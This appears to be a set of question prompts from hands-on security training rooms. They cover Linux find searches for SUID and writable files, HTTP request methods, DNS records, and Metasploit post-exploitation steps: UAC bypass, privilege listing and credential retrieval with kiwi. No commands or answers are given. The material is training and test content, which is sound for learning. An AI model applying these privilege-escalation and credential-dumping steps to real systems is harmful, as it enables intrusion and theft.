Find all files in the `/home` directory (recursive) with size less than 2 KiB and extension `.txt`

Find all files with write permission for the group `others`, regardless of any other permissions, with extension `.sh` (use symbolic format)

Find all files in the `/usr/bin` directory (recursive) that are owned by root and have at least the SUID permission (use symbolic format)

Find all files that were not accessed in the last 10 days with extension `.png`

Find all files in the `/usr/bin` directory (recursive) that have been modified within the last 2 hours

How many packets are in the `dns.cap` file?

`POST` Request

`PUT` Request

`DELETE` Request

`GET` Request

Make a `GET` request to `/room`

Make a `GET` request to `/blog` and using the gear icon set the `id` parameter to `1` in the URL field

Make a `DELETE` request to `/user/1`

Make a `PUT` request to `/user/2` with the `username` parameter set to `admin`

`POST` the `username` of `thm` and a `password` of `letmein` to `/login`

Which of the following characters cannot be used in a subdomain: `3`, `b`, `_` or `-`?

What type of TLD is `.co.uk`?

What is the CNAME of `shop.website.thm`?

What is the IP address for the A record of `www.website.thm`?

What is the name of the incorrect option for `exploit/windows/local/bypassuac_eventvwr`?

What permission listed by `getprivs` allows us to take ownership of files?

What user is listed by `getuid`?

Which `kiwi` command allows up to retrieve all credentials?

What is this machine vulnerable to (answer in the form of: `ms??-???`)?